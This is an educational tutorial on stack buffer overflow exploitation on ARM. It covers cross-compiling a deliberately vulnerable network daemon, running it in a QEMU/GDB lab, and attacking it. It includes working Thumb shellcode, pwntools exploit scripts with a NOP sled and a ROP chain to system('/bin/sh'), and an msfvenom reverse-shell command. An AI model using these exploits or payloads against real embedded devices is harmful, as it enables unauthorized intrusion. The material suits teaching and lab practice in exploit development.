Tutorial

Exploiting an Embedded Service: Buffer Overflow on ARM

Cross-compile a vulnerable network daemon for ARM, exploit a stack buffer overflow with ARM-specific techniques, and build ARM ROP chains in a QEMU/GDB lab.

Embedded Exploit Development

Prerequisites

  • Completion of the Buildroot/QEMU cross-compiling tutorial
  • Understanding of stack buffer overflows (see the Linux exploitation series)
  • Basic ARM assembly knowledge helpful but not required
  • GDB experience

Part 5 of 7 in Embedded Systems & Firmware

The Linux exploitation series covers stack overflows, ROP chains, and ASLR bypasses, all on x86/x64. But most embedded devices run ARM processors: Cortex-A in routers and phones, Cortex-M in microcontrollers, older ARM7/ARM9 in legacy industrial equipment. ARM’s instruction set, calling convention, and stack layout differ from x86 in ways that directly affect how you write exploits.

This tutorial bridges the gap. You’ll cross-compile a vulnerable network service for ARM using the Buildroot toolchain, deploy it to the QEMU environment, and exploit a stack buffer overflow, covering the ARM-specific techniques needed at each step.

ARM vs x86: What’s different for exploit development

Before writing any code, understand the key architectural differences.

Calling convention

On 32-bit x86 (cdecl), function arguments are pushed onto the stack in reverse order. On ARM (AAPCS, the Procedure Call Standard for the ARM Architecture), the first four word-sized arguments go in registers and any remaining arguments go on the stack:

x86:                          ARM:
  push arg3                     R0 = arg1
  push arg2                     R1 = arg2
  push arg1                     R2 = arg3
  call function                 R3 = arg4
                                BL function    (Branch with Link)
                                SP → arg5, arg6, ... (if needed)
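
The register assignment above can be sketched in a few lines of Python. This is a simplified illustration that assumes every argument is a 32-bit integer or pointer; 64-bit values, floats, and structs follow additional AAPCS rules that are not modeled here. The helper name place_args is hypothetical.

```python
def place_args(args):
    """Split 32-bit arguments into AAPCS registers (R0-R3) and stack slots."""
    regs = {f"r{i}": value for i, value in enumerate(args[:4])}
    stack = list(args[4:])  # fifth argument onward, lowest stack address first
    return regs, stack


regs, stack = place_args([0x11, 0x22, 0x33, 0x44, 0x55, 0x66])
print(regs)   # {'r0': 17, 'r1': 34, 'r2': 51, 'r3': 68}
print(stack)  # [85, 102]
```

For ROP this means a chain that calls a function with up to four arguments only has to load registers; nothing has to be laid out as stack arguments.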

Return address

On x86, CALL pushes the return address onto the stack, and RET pops it. On ARM, BL (Branch with Link) stores the return address in the Link Register (LR / R14), and functions return with BX LR or POP {PC}.

x86 call:                     ARM call:
  CALL func                    BL func
  → pushes return addr         → LR = return addr
    to stack                     (NOT on stack)
  → RET pops it                → BX LR returns

  Stack has return addr        Stack does NOT have return addr
  → overflow can overwrite it  → ...unless function saves LR

This is the critical difference for exploitation. If a function never pushes LR to the stack, there’s no return address on the stack to overwrite. But any function that calls another function (a non-leaf function) must save LR, and it saves it to the stack with PUSH {LR} in the prologue.

; Leaf function (no stack return address)
leaf_func:
    ADD R0, R1, R2
    BX LR              ; return via LR register

; Non-leaf function (LR saved on stack — exploitable)
nonleaf_func:
    PUSH {R4-R7, LR}   ; save LR and callee-saved regs to stack
    BL some_other_func  ; LR gets overwritten, but old LR is on stack
    ...
    POP {R4-R7, PC}     ; pop saved LR directly into PC → return

The POP {PC} instruction at the end of non-leaf functions is the ARM equivalent of x86’s RET. Overwriting the saved LR value on the stack controls PC on return.
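
To make the epilogue concrete, here is a minimal Python sketch that emulates POP {R4-R7, PC} over a block of bytes standing in for the stack. The helper pop_regs and the frame contents are illustrative assumptions, not output from a real target.

```python
import struct


def pop_regs(stack: bytes, sp: int, names):
    """Emulate POP {names}: load consecutive little-endian words starting at sp."""
    values = struct.unpack_from(f"<{len(names)}I", stack, sp)
    return dict(zip(names, values)), sp + 4 * len(names)


# Frame as left by PUSH {R4-R7, LR}: lowest register at the lowest address,
# saved LR last. An overflow that reaches the last word controls PC.
frame = struct.pack("<5I", 0x44444444, 0x55555555, 0x66666666, 0x77777777, 0xDEADBEEF)

regs, sp = pop_regs(frame, 0, ["r4", "r5", "r6", "r7", "pc"])
print(hex(regs["pc"]))  # 0xdeadbeef
print(sp)               # 20
```

The same walk applies to every gadget that ends in a POP with PC in its register list, which is why SP keeps advancing through the attacker-supplied words.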

Thumb mode

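ARM processors can execute two instruction sets: ARM (fixed 32-bit instructions) and Thumb (16-bit instructions for denser code; Thumb-2 adds 32-bit encodings). Most modern ARM binaries use Thumb or Thumb-2. The processor tracks the current state in the T bit of CPSR, and an interworking branch (BX, BLX, or a POP into PC) selects the state from the LSB (least significant bit) of the branch target address: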

Address 0x00010000 → ARM mode   (bit 0 = 0)
Address 0x00010001 → Thumb mode (bit 0 = 1)

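When building ROP chains, gadget addresses must have the correct LSB for the instruction mode. Using an ARM-mode address to jump into Thumb code (or vice versa) makes the CPU decode the bytes with the wrong instruction set, which usually ends in an undefined instruction exception or a crash at an unrelated address.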
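
A small helper keeps the mode bit explicit when you assemble addresses. This is a sketch; encode_target and decode_target are hypothetical names, and the alignment check reflects the requirement that ARM-mode instructions sit on 4-byte boundaries.

```python
def encode_target(addr: int, thumb: bool) -> int:
    """Return the value to place on the stack for an interworking branch."""
    if thumb:
        return addr | 1  # bit 0 set selects Thumb state
    if addr & 3:
        raise ValueError("ARM-mode targets must be 4-byte aligned")
    return addr


def decode_target(value: int):
    """Split a branch target into (mode, actual instruction address)."""
    return ("thumb" if value & 1 else "arm"), value & ~1


print(hex(encode_target(0x10000, thumb=True)))  # 0x10001
print(decode_target(0x10001))                   # ('thumb', 65536)
```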

No x86-style NOP sled

On x86, 0x90 is a single-byte NOP used for NOP sleds. ARM instructions are 4 bytes (or 2 bytes in Thumb). Any MOV Rx, Rx works as a NOP: 0xE1A00000 (MOV R0, R0) in ARM mode, 0x46C0 (MOV R8, R8) in Thumb. Plan your shellcode padding accordingly.
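
The two NOP encodings can be packed into little-endian bytes with the standard library. This sketch only shows the byte layout; the nop_sled helper is a hypothetical name.

```python
import struct

ARM_NOP = struct.pack("<I", 0xE1A00000)  # MOV R0, R0 (4 bytes)
THUMB_NOP = struct.pack("<H", 0x46C0)    # MOV R8, R8 (2 bytes)


def nop_sled(count: int, thumb: bool) -> bytes:
    """Return `count` NOP instructions for the chosen instruction set."""
    return (THUMB_NOP if thumb else ARM_NOP) * count


print(nop_sled(2, thumb=True).hex())   # c046c046
print(nop_sled(1, thumb=False).hex())  # 0000a0e1
```

Because every instruction is 2 or 4 bytes wide, a return address that lands in the middle of an instruction decodes as something else, so sled entry points must respect that alignment.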

Building the vulnerable target

Create a simple network daemon with a buffer overflow, cross-compile it for ARM, and deploy it to the QEMU Buildroot environment.

The vulnerable service

// vuln_arm.c — a deliberately vulnerable echo server for ARM
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

// Training anchor for the ROP stage. Real targets usually do not hand you this.
// Mark it used so the linker keeps system() and the "/bin/sh" string available.
__attribute__((used))
void keep_system_available(void) {
    system("/bin/sh");
}

void handle_request(int client_fd) {
    char buf[128];
    char response[256];

    // BUG: reads up to 1024 bytes into 128-byte buffer
    int n = recv(client_fd, buf, 1024, 0);
    if (n <= 0) return;
    buf[n < 128 ? n : 127] = '\0';  // won't help — damage already done

    snprintf(response, sizeof(response), "Echo: %s\n", buf);
    send(client_fd, response, strlen(response), 0);
}

int main() {
    int server_fd = socket(AF_INET, SOCK_STREAM, 0);
    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(8888),
        .sin_addr.s_addr = INADDR_ANY,
    };

    bind(server_fd, (struct sockaddr *)&addr, sizeof(addr));
    listen(server_fd, 5);
    printf("Listening on port 8888\n");

    while (1) {
        int client_fd = accept(server_fd, NULL, NULL);
        handle_request(client_fd);
        close(client_fd);
    }
}

Cross-compiling for ARM

Use the Buildroot cross-compilation toolchain from the previous tutorial. Do not hardcode the toolchain tuple; Buildroot names it based on the target ABI you configured.

export BUILDROOT=~/buildroot
# Buildroot's *-gcc entries are usually symlinks to its toolchain wrapper, so do not filter on -type f
export CC="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 -name '*-gcc' | head -1)"
export READELF="$(find "$BUILDROOT/output/host/bin" -maxdepth 1 -name '*-readelf' | head -1)"

# Compile with debug symbols, no stack protector, no PIE, executable stack
$CC -o vuln_arm vuln_arm.c \
    -g -O0 \
    -fno-stack-protector \
    -no-pie \
    -z execstack \
    -static

# Verify the binary
file vuln_arm
# vuln_arm: ELF 32-bit LSB executable, ARM, EABI5 version 1, statically linked, ...

$READELF -W -l vuln_arm | grep GNU_STACK
# GNU_STACK ... RWE ...  (executable stack for Stage 1)

For subsequent stages, remove the executable-stack request:

$CC -o vuln_arm_nx vuln_arm.c \
    -g -O0 \
    -fno-stack-protector \
    -no-pie \
    -static

$READELF -W -l vuln_arm_nx | grep GNU_STACK
# GNU_STACK ... RW ...   (the binary requests a non-executable stack)

Warning

NX depends on the emulated CPU and kernel. Removing -z execstack only changes the ELF stack permission request. Whether the stack is actually non-executable depends on the kernel and emulated CPU. The versatilepb machine used in the Buildroot lab emulates an ARM926, an ARMv5 core that predates the execute-never (XN) page attribute introduced in ARMv6, so it will most likely not enforce a non-executable stack the way a newer Cortex-A target does. Always verify the runtime mapping in GDB before claiming an NX bypass. If the stack still appears executable, this stage is still useful ARM ROP practice, but it is not demonstrating a real NX bypass on that VM.

Deploying to QEMU

Copy the binary into the Buildroot rootfs and boot:

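# Run from $BUILDROOT: the output/ paths below are relative to it.
# Adjust the vuln_arm paths if you compiled the binaries elsewhere.
# Mount the rootfs image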
sudo mount -o loop output/images/rootfs.ext4 /mnt
sudo cp vuln_arm /mnt/root/
sudo cp vuln_arm_nx /mnt/root/
sudo umount /mnt

# Boot QEMU with the same configuration from the cross-compiling tutorial,
# adding port 8888 for the vulnerable service
qemu-system-arm \
    -M versatilepb \
    -m 256M \
    -kernel output/images/zImage \
    -dtb output/images/versatile-pb.dtb \
    -drive file=output/images/rootfs.ext4,if=scsi,format=raw \
    -append "root=/dev/sda console=ttyAMA0,115200" \
    -nographic \
    -net nic,model=rtl8139 \
    -net user,hostfwd=tcp::2222-:22,hostfwd=tcp::8888-:8888,hostfwd=tcp::1234-:1234

The hostfwd flags forward port 2222 for SSH, port 8888 for the vulnerable service, and port 1234 for GDB.

Inside the QEMU VM:

# Lab-only: keep stack addresses stable while learning.
echo 0 > /proc/sys/kernel/randomize_va_space

/root/vuln_arm &

When switching to gdbserver, stop the background copy first so it does not keep port 8888 bound:

killall vuln_arm 2>/dev/null || true

Finding the overflow offset

The process is the same as x86, adapted for ARM.

Generating a cyclic pattern

# Using pwntools
python3 -c "from pwn import *; print(cyclic(512).decode())" > pattern.txt

Sending the pattern

#!/usr/bin/env python3
from pwn import *

r = remote('127.0.0.1', 8888)
r.send(cyclic(512))
r.close()

Analyzing the crash in GDB

Run the vulnerable binary under gdbserver inside QEMU:

# In QEMU
gdbserver :1234 /root/vuln_arm

On the host, connect with the ARM-aware GDB:

gdb-multiarch -q vuln_arm
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) continue

After sending the pattern, GDB catches the crash:

Program received signal SIGSEGV, Segmentation fault.
0x6261616c in ?? ()
(gdb) info registers
r0   0x0
r1   0x0
...
r4   0x62616168   ← controlled (from POP)
r5   0x62616169   ← controlled
r6   0x6261616a   ← controlled
r7   0x6261616b   ← controlled
sp   0xbefff100
pc   0x6261616c   ← controlled! (saved LR popped into PC)

The PC value tells you the offset:

from pwn import *
print(cyclic_find(0x6261616c))  # 144 for this sample crash

On ARM, the saved LR is often popped into PC via an epilogue such as POP {R4-R7, PC}. In this example crash, the saved LR on the stack was at offset 144 bytes from the start of the cyclic pattern. Treat that number as a measured result, not a rule. Different compiler versions, optimization levels, frame-pointer settings, and local-variable layouts can move buf, response, padding, and saved registers around.

If your crash lands on a different cyclic value, use your value. If the compiler places response[256] between buf and the saved registers, the offset will be much larger than 144.
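
If you want to see how a crash value maps back to an offset without pwntools, the following standard-library sketch generates a de Bruijn pattern over the lowercase alphabet with 4-byte subsequences. It is intended to mirror the pwntools defaults, but treat that as an assumption and cross-check against cyclic_find on your own system. The function names reuse the pwntools names for readability only.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes, n: int):
    """Yield a de Bruijn sequence: every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int) -> bytes:
    out = bytearray()
    for c in de_bruijn(ALPHABET, 4):
        if len(out) >= length:
            break
        out.append(c)
    return bytes(out)


def cyclic_find(value: int, length: int = 1024) -> int:
    """Offset of a little-endian 32-bit register value inside the pattern, or -1."""
    return cyclic(length).find(struct.pack("<I", value))


pattern = cyclic(512)
print(pattern[:16])                                # b'aaaabaaacaaadaaa'
pc = struct.unpack_from("<I", pattern, 144)[0]     # word that lands in PC at offset 144
print(cyclic_find(pc))                             # 144
```

Because each 4-byte window is unique, any register that ends up holding pattern bytes identifies exactly one offset.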

Stack layout at overflow:

  Low address
  ┌──────────────┐ ← buf[0]
  │ buf[128]     │
  │ (128 bytes)  │
  ├──────────────┤
  │ saved R4     │ ← offset 128 (4 bytes, controlled)
  ├──────────────┤
  │ saved R5     │ ← offset 132
  ├──────────────┤
  │ saved R6     │ ← offset 136
  ├──────────────┤
  │ saved R7     │ ← offset 140
  ├──────────────┤
  │ saved LR     │ ← offset 144 (→ popped into PC)
  └──────────────┘
  High address

The exact registers saved depend on the function’s prologue. Disassemble handle_request to see what your binary does:

(gdb) disas handle_request
   0x00010504 <+0>:     push    {r4, r5, r6, r7, lr}
   0x00010508 <+4>:     sub     sp, sp, #396
   ...
   0x00010640 <+316>:   pop     {r4, r5, r6, r7, pc}

The prologue pushes R4-R7 and LR. The epilogue pops them back, with the saved LR going directly into PC. In this sample layout, offset to saved LR = buffer size (128) + alignment padding (0 here) + saved registers (R4-R7 = 16 bytes) = 144. Reconfirm this whenever you rebuild.
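
The arithmetic for the sample frame can be written out as a short check. This sketch assumes buf sits directly below the saved registers, as in the sample layout; the function names are hypothetical, and the numbers come from the sample disassembly (five pushed registers, sub sp, sp, #396).

```python
WORD = 4  # bytes per 32-bit register


def offset_to_saved_lr(buf_size: int, padding: int, regs_saved_below_lr: int) -> int:
    """Distance from buf[0] to the saved LR for the sample layout."""
    return buf_size + padding + WORD * regs_saved_below_lr


def frame_is_aligned(pushed_regs: int, locals_size: int, alignment: int = 8) -> bool:
    """Check that the pushed registers plus locals keep SP 8-byte aligned."""
    return (WORD * pushed_regs + locals_size) % alignment == 0


print(offset_to_saved_lr(128, 0, 4))  # 144
print(frame_is_aligned(5, 396))       # True
```

If your prologue pushes a different register list, change the third argument and compare the result with your cyclic_find value; a mismatch usually means padding or another local sits between buf and the saved registers.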

Stage 1: Shellcode on executable stack

With -z execstack, the stack is executable. This is the simplest case.

ARM shellcode

ARM Thumb shellcode for execve("/bin/sh", NULL, NULL):

# Pure Thumb-mode execve("/bin/sh") shellcode.
# Uses SVC 0 (supervisor call) — the ARM equivalent of x86 INT 0x80
shellcode = (
    b"\x78\x46"           # mov   r0, pc          ; r0 = current addr + 4 (pipeline)
    b"\x08\x30"           # adds  r0, #8          ; r0 -> "/bin/sh" string
    b"\x49\x40"           # eors  r1, r1          ; argv = NULL (Linux accepts this)
    b"\x52\x40"           # eors  r2, r2          ; envp = NULL
    b"\x0b\x27"           # movs  r7, #11         ; r7 = 11 (SYS_execve)
    b"\x00\xdf"           # svc   0               ; syscall
    b"\x2f\x62\x69\x6e"   # "/bin"
    b"\x2f\x73\x68\x00"   # "/sh\0"
)

Note

ARM pipeline and PC reads. When you read PC in an instruction, the value isn’t the address of that instruction; it’s the address plus a pipeline offset: +8 in ARM mode, +4 in Thumb mode. This is why MOV R0, PC at address X gives R0 = X + 4 in Thumb. The string begins 12 bytes after the first instruction, so adds r0, #8 moves from X + 4 to X + 12.
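
The PC arithmetic in this note can be checked directly against the shellcode bytes. The sketch below copies the bytes from the listing above and treats the first instruction as address X = 0; pc_read_value is a hypothetical helper name.

```python
shellcode = (
    b"\x78\x46"          # mov   r0, pc
    b"\x08\x30"          # adds  r0, #8
    b"\x49\x40"          # eors  r1, r1
    b"\x52\x40"          # eors  r2, r2
    b"\x0b\x27"          # movs  r7, #11
    b"\x00\xdf"          # svc   0
    b"\x2f\x62\x69\x6e"  # "/bin"
    b"\x2f\x73\x68\x00"  # "/sh\0"
)


def pc_read_value(insn_addr: int, thumb: bool) -> int:
    """Value an instruction observes when it reads PC."""
    return insn_addr + (4 if thumb else 8)


r0 = pc_read_value(0, thumb=True) + 8  # mov r0, pc at X = 0, then adds r0, #8
print(r0)                              # 12
print(shellcode.index(b"/bin/sh"))     # 12
```

If you add or remove instructions before the string, rerun the check and adjust the immediate in adds r0 so both numbers still agree.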

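Or generate a reverse shell with msfvenom. The recv() call copies null bytes unchanged, so no bad-character filter is needed here. The payload is entered in ARM mode, so if you substitute it for the Thumb shellcode in the exploit below, use ARM NOPs and a 4-byte-aligned return address without the +1, and check that the payload fits before the saved LR:

msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.0.2.2 LPORT=4444 \
         -f python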

Exploit

#!/usr/bin/env python3
from pwn import *

context.arch = 'arm'
context.endian = 'little'

TARGET = ('127.0.0.1', 8888)
OFFSET_TO_LR = 144  # replace with your cyclic_find result

# Address of buf on the stack — find it in GDB with the -g build:
#   (gdb) break handle_request
#   (gdb) continue
#   (gdb) print &buf
BUF_ADDR = 0xbefff000  # adjust based on your GDB output

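# Build payload (define `shellcode` from the previous section above this line)
payload = b"\xc0\x46" * 40   # Thumb NOP sled: 40 x MOV R8, R8 (80 bytes)
payload += shellcode
assert len(payload) <= OFFSET_TO_LR, "sled + shellcode must fit before the saved LR"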
payload += b"A" * (OFFSET_TO_LR - len(payload))  # pad to saved LR
payload += p32(BUF_ADDR + 1)  # +1 for Thumb mode bit

r = remote(*TARGET)
r.send(payload)
r.close()

Note

The +1 on the return address is critical. ARM uses the LSB to indicate Thumb mode. The payload starts with a Thumb NOP sled and pure Thumb shellcode, so the branch target must have bit 0 set.

Warning

The execve shellcode above spawns /bin/sh locally on the target, but the shell’s stdin/stdout are not connected to the TCP socket. In GDB you can confirm code execution by watching PC reach the stack buffer and the svc instruction, but you won’t get an interactive shell over the network. For a practical remote shell, use the msfvenom reverse shell payload shown above, or add dup2 calls that redirect the socket fd to stdin, stdout, and stderr before the execve.

Stage 2: ROP chain after removing execstack

Recompile without -z execstack. Then verify whether the stack is non-executable at runtime:

# In QEMU
killall vuln_arm vuln_arm_nx 2>/dev/null || true
gdbserver :1234 /root/vuln_arm_nx

# On the host
gdb-multiarch -q vuln_arm_nx
(gdb) set architecture arm
(gdb) target remote :1234
(gdb) break main
(gdb) continue

# Once the breakpoint in main is hit
(gdb) info proc mappings
# Look for the stack region:
# rw-p = non-executable stack
# rwxp = executable stack; your VM is not enforcing NX for this mapping
# If your GDB prints no permissions column, read /proc/<pid>/maps inside the VM instead

If the stack is rw-p, injected shellcode should fault and ROP is required. If the stack is still rwxp, continue with this section as ROP practice rather than as an NX-bypass claim.
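
The same check can be scripted against the text of /proc/<pid>/maps copied out of the VM. This is a minimal sketch: it assumes the kernel's usual maps format with a [stack] label, the sample lines are hypothetical, and stack_is_executable is not part of any tool.

```python
def stack_is_executable(maps_text: str):
    """Return True/False for the [stack] mapping, or None if it is not listed."""
    for line in maps_text.splitlines():
        fields = line.split()
        if fields and fields[-1] == "[stack]":
            return "x" in fields[1]  # second field is the permission string
    return None


# Hypothetical sample, shaped like /proc/<pid>/maps output
sample = """\
00010000-00090000 r-xp 00000000 fe:00 42 /root/vuln_arm_nx
befdf000-bf000000 rw-p 00000000 00:00 0 [stack]
"""

print(stack_is_executable(sample))                          # False
print(stack_is_executable(sample.replace("rw-p", "rwxp")))  # True
```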

ARM ROP gadgets

ARM ROP gadgets look different from x86. The key chain terminator is POP {PC} (equivalent to x86’s RET), and POP {R0-R3, PC} controls both argument registers and the return address.

Common useful ARM gadgets:

pop {r0, pc}          ← set first argument + chain
pop {r0, r1, pc}      ← set first two arguments + chain
pop {r4, r5, r6, r7, pc}  ← very common (function epilogues)
mov r0, r4; pop {r4, pc}  ← move saved value to arg register
blx r3                ← call function pointer in r3

Finding gadgets

Use ROPgadget or ropper with ARM support:

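# ROPgadget detects the architecture from the ELF header
ROPgadget --binary vuln_arm_nx
# Add --thumb to search in Thumb mode
ROPgadget --binary vuln_arm_nx --thumb

# Or with ropper
ropper --file vuln_arm_nx --arch ARM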

For a statically linked binary, you’ll find thousands of gadgets. Key ones to locate:

# Find gadgets that control r0 (first argument)
ROPgadget --binary vuln_arm_nx | grep "pop.*r0.*pc"

# Find gadgets that call through a register
ROPgadget --binary vuln_arm_nx | grep "blx r"
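
With thousands of gadgets, it can help to load the tool output into a dictionary instead of grepping repeatedly. The sketch below assumes ROPgadget's usual "0xADDRESS : instructions" line format; the sample text and addresses are hypothetical, and parse_gadgets is an illustrative helper.

```python
import re

GADGET_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s*:\s*(.+)$")


def parse_gadgets(text: str) -> dict:
    """Map gadget text to its first listed address."""
    gadgets = {}
    for line in text.splitlines():
        match = GADGET_RE.match(line.strip())
        if match:
            gadgets.setdefault(match.group(2).strip(), int(match.group(1), 16))
    return gadgets


# Hypothetical excerpt of saved tool output
sample = """\
Gadgets information
============================================================
0x00012344 : pop {r0, pc}
0x00010580 : pop {r4, r5, r6, r7, pc}
0x00020100 : mov r0, r4 ; pop {r4, pc}
"""

gadgets = parse_gadgets(sample)
print(hex(gadgets["pop {r0, pc}"]))  # 0x12344
print(len(gadgets))                  # 3
```

Save the real output with a shell redirect and pass the file contents to parse_gadgets; header and separator lines are skipped because they do not start with an address.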

Building the chain: system(“/bin/sh”)

For this controlled lab, keep_system_available() intentionally references system("/bin/sh") so the static binary contains both the function and the string. Do not assume this in real targets. In real firmware, confirm symbols and strings first, or build an execve syscall chain instead.

Check the binary before writing the chain:

nm -n vuln_arm_nx | grep ' system$'
ROPgadget --binary vuln_arm_nx --string '/bin/sh'

#!/usr/bin/env python3
from pwn import *

context.arch = 'arm'

elf = ELF('./vuln_arm_nx')
TARGET = ('127.0.0.1', 8888)

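# Placeholder gadget addresses: replace every value with your own ROPgadget output.
# ARM-mode gadget addresses are 4-byte aligned; set bit 0 only for Thumb gadgets.
POP_R0_PC = 0x00012344      # pop {r0, pc}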
POP_R0_R1_PC = 0x00012400   # pop {r0, r1, pc}
POP_R4_R5_R6_R7_PC = 0x00010580  # pop {r4, r5, r6, r7, pc}
MOV_R0_R4_POP_R4_PC = 0x00020100  # mov r0, r4; pop {r4, pc}

SYSTEM_ADDR = elf.symbols['system']
BIN_SH = next(elf.search(b'/bin/sh\x00'))

print(f"system() @ {hex(SYSTEM_ADDR)}")
print(f"/bin/sh  @ {hex(BIN_SH)}")

# ROP chain
# Goal: system("/bin/sh")
# Need: R0 = address of "/bin/sh", then call system()
rop = b""
rop += p32(POP_R0_PC)      # gadget: pop {r0, pc}
rop += p32(BIN_SH)         # r0 = "/bin/sh"
rop += p32(SYSTEM_ADDR)    # pc = system() — this calls system(r0)

# Build full payload
OFFSET_TO_LR = 144  # replace with your cyclic_find result
payload = b"A" * OFFSET_TO_LR
payload += rop      # overwrites saved LR -> first gadget

r = remote(*TARGET)
r.send(payload)
r.close()

This chain calls system("/bin/sh"), but the shell’s stdio still belongs to the service process, not the TCP socket. Use GDB to prove that PC reaches system, or, if you want an interactive socket shell, extend the chain with dup2(client_fd, 0), dup2(client_fd, 1), and dup2(client_fd, 2) ahead of the final call. That socket-reuse pattern is covered in the remote exploitation tutorial.

ARM-specific ROP challenges

Register setup is indirect. On x86-64, pop rdi; ret directly sets the first argument register. On ARM, function epilogues pop callee-saved registers (R4-R11) and PC, but not argument registers (R0-R3). You often need a two-step chain:

Step 1: pop {r4, pc}   → load value into r4
Step 2: mov r0, r4; ... ; pop {pc}  → move r4 to r0 (arg register)
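
The two-step pattern can be laid out as stack words like this. It is a sketch with hypothetical addresses throughout; it assumes the second gadget is exactly mov r0, r4; pop {r4, pc}, which needs one filler word for its own pop.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value)


# Hypothetical addresses: replace with values from your own binary
POP_R4_PC = 0x00010A10            # pop {r4, pc}
MOV_R0_R4_POP_R4_PC = 0x00020100  # mov r0, r4 ; pop {r4, pc}
BIN_SH = 0x00071234               # address of "/bin/sh"
SYSTEM = 0x00015000               # address of system()

chain = b"".join([
    p32(POP_R4_PC),            # overwrites saved LR: first gadget
    p32(BIN_SH),               # popped into r4
    p32(MOV_R0_R4_POP_R4_PC),  # popped into pc: r0 = r4
    p32(0x41414141),           # filler popped into r4 by the second gadget
    p32(SYSTEM),               # popped into pc: system(r0)
])

print(len(chain))  # 20
```

Each gadget consumes exactly the words its POP lists, so counting registers per gadget tells you how many filler words the chain needs.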

BLX vs POP {PC}. BLX (Branch with Link and Exchange) saves the return address in LR, which complicates chaining because the next gadget’s address isn’t on the stack. Prefer gadgets that end with POP {PC} for clean chaining.

Thumb interworking. If some gadgets are in ARM mode and others in Thumb mode, ensure addresses have the correct LSB. Mixed-mode chains are possible but require care.

Debugging ARM exploits with GDB

Useful GDB commands for ARM

# Show all registers including CPSR (flags)
(gdb) info registers

# Show CPSR, including the Thumb-state T bit
(gdb) info registers cpsr

# Override disassembly mode when GDB guesses wrong
(gdb) set arm force-mode thumb
(gdb) disas 0x10504

# Examine stack
(gdb) x/20wx $sp

# Set breakpoint at function epilogue
(gdb) break *0x10640

# Step one instruction
(gdb) stepi
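
When reading the CPSR value that GDB prints, the Thumb state is bit 5 (the T bit). A quick way to decode it, as a sketch with made-up register values:

```python
T_BIT = 1 << 5  # CPSR bit 5: set while the core executes Thumb code


def cpsr_state(cpsr: int) -> str:
    """Return the instruction set state encoded in a CPSR value."""
    return "thumb" if cpsr & T_BIT else "arm"


print(cpsr_state(0x60000030))  # thumb
print(cpsr_state(0x60000010))  # arm
```

If the state does not match the gadget you intended to reach, recheck bit 0 of the address you placed on the stack.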

Checking NX from GDB

(gdb) info proc mappings
# Look for the stack region's permissions
# rw-p = non-executable stack
# rwxp = executable stack

Examining the crash

(gdb) info registers pc lr sp
(gdb) x/10i $pc    # disassemble at crash point
(gdb) x/20wx $sp   # examine stack contents

Practical exercise

  1. Cross-compile vuln_arm.c for ARM with an executable stack, deploy it to QEMU, and find the exact overflow offset using cyclic patterns.
  2. Write and test Thumb shellcode that spawns /bin/sh, then verify in GDB that execution reaches the execve syscall.
  3. Recompile without -z execstack, verify the runtime stack mapping, and confirm whether shellcode on the stack crashes on your VM.
  4. Build an ARM ROP chain that calls system("/bin/sh") and verify that PC reaches system. Optionally extend the chain with dup2 for a socket-backed shell.
  5. Compare the exploit development experience with the x86 tutorials, and note how the calling convention and the POP {PC} pattern change your approach.

If you’re coming from the x86 exploitation series, the mental model translates directly. The details change but the principles are identical: control the instruction pointer, set up arguments, redirect to a useful function.